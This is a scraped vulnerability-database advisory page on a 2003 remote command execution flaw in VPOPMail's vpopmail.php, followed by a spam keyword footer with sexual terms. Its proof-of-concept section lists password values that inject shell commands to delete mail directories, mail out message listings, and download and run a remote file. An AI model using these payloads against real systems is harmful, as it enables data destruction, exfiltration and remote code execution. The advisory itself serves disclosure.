about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VPOPMail vpopmail.php Remote Command Execution Vulnerability


Title VPOPMail vpopmail.php Remote Command Execution Vulnerability
Published 2003-03-11-12:00AM
Updated 2003-03-11-03:32PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability credited to error <error@lostinthenoise.net>.
Vulnerable  VPOPMail VPOPMail 0.97
VPOPMail VPOPMail 0.96
VPOPMail VPOPMail 0.95
VPOPMail VPOPMail 0.9
Not Vulnerable  
Code   The following proof of concepts were provided:

password;~vpopmail/bin/vpasswd user@host password
password;rm -rf ~vpopmail/
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 05:44:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
prodFTPD 1 lo170l asp vulner www.qingde 258 zeroboard Bondage www.aikuai PHP HTML NEWS SEARC autoindex svftp abbywinter aramina taboo2-the sexy girlc NEWS SEARC guest book open webma pornfo www.jgl200 Exploits o my goody Crack Data kar 20.com bank bii news for c Crack Data farel sxe inject 8f99.com all cartoo www.indiap pink wor SEX DOG web wiz ne Crack Data fhm magazi extrasexy gaympe Mail Admin mambo Remo fr4ee sexv free pornv posta+oks+ shopyop.ne Sexmoviesm katrina ka Koolclub free fucki